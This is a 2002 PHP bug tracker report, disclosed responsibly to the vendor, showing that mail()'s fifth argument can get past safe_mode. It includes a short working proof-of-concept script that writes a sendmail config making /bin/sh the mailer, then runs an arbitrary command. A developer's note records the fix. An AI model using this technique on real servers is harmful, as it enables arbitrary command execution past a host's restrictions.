php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #17745 bypassing safe_mode with mail()
Submitted: 2002-06-13 12:36 UTC Modified: 2002-07-02 09:55 UTC
From: cliph at isec dot pl Assigned:
Status: Closed Package: Mail related
PHP Version: 4.2.1 OS: Any
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: cliph at isec dot pl
New email:
PHP Version: OS:

 

 [2002-06-13 12:36 UTC] cliph at isec dot pl
If PHP is configured with safe_mode option enabled, special restriction are set up including limit on external binaries that may be executed from within a PHP script.

The 5th argument to the mail() function (introduced in version 4.0.5) allow specifying command line option to the sendmail binary. Some time ago a bug was found in the mail() function allowing to pass shell meta-characters in the 5th argument, leading to execute arbitrary shell commands or external binaries. This bug was fixed in version 4.1.0.

However, mail() function is still vulnerable because it allows to pass command line arguments to the sendmail binary which gives the ability to influence its behavior (i.e. by using non-default aliases, custom configuration files - other cases are possible with others MTAs)

Passing 5th argument should be disabled if PHP is configured in safe_mode.

Sample exploit that works with sendmail MTA:

-----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----

Regards,
Wojciech Purczynski <cliph@isec.pl>
iSEC Security Research
http://isec.pl/

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-07-02 09:55 UTC] derick@php.net
This bug has been fixed in CVS. You can grab a snapshot of the
CVS version at http://snaps.php.net/. In case this was a documentation 
problem, the fix will show up soon at http://www.php.net/manual/.
In case this was a PHP.net website problem, the change will show
up on the PHP.net site and on the mirror sites.
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Fri Jul 23 18:01:23 2021 UTC